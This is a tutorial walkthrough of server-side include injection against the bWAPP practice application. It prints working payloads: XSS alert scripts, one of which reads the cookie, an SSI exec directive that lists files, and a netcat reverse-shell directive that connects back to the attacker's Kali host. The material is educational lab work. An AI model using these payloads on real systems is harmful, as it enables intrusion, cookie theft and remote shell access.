Server Side Injection Exploitation in bWapp
In this article you will learn how to exploit any server using server side include injection which is commonly known as SSI.
SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server.
For more information visit owasp.org
Let’s begin
In your kali Linux open the target IP in browser: 192.168.1.103/bWAPP/login.php. Enter user and password as bee and bug respectively.
Set security level low, from list box chooses your bug select server side include injection now and click on hack
Now request web page will get open where you can see it is having two text fields for first name and last name respectfully.
Then I had given random name test: test as the first name and last name respectfully, to know what exactly I will receive when I will click on lookup tab. Here first name text filed is vulnerable to SSI injection.
when I clicked on lookup, a new wep page pop up on the window screen which was showning the IP 192.168.1.107 of my Kali Linux.
Now I will try to exploit this vulnerability by sending different types of malicious code into web application. If you will see following screenshot carefully here I had sent a script which will generate an alert prompt in window screen. To perform this you need to modify text field of first name and type following code inside it.
<script>alert(“hack”)</script>
So when again we will click on lookup then an alert prompt “hack” will pop up in the window screen. Hence it confirms that first name text filed is vulnerable.
If I am willing to fetch cookies of the web server then this can be possible here also. Only we need to type following script code in the same text filed.
<script>alert(document.cookie)</script>
Now again an alert prompt will pop up with server’s cookie, which we can use for further exploitation.
Using exec directive we can execute a server side command with cmd as parameters. Here I am trying to retrieve all lists of files and folder using following code.
<!–#exec cmd=”ls -a” –>
Wonderful!! So you can see without making proper compromise to the server we have got all present directories inside it.
Now at last finally we will try to access its remote shell using netcat which will help us for establishing a reverse connection with targeted system. Open a terminal to start netcat listener on port 4444 and type following inside vulnerable text filed as done above.
<!–#exec cmd=”nc 192.168.1.107 4444 -e /bin/bash” –>
So when again you will click on lookup tab you will get reverse connection through netcat shell as I have received in following image which means the web application server is hacked where we can execute following command to penetrate more and more.
Id
pwd
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Source: www.hackingarticles.in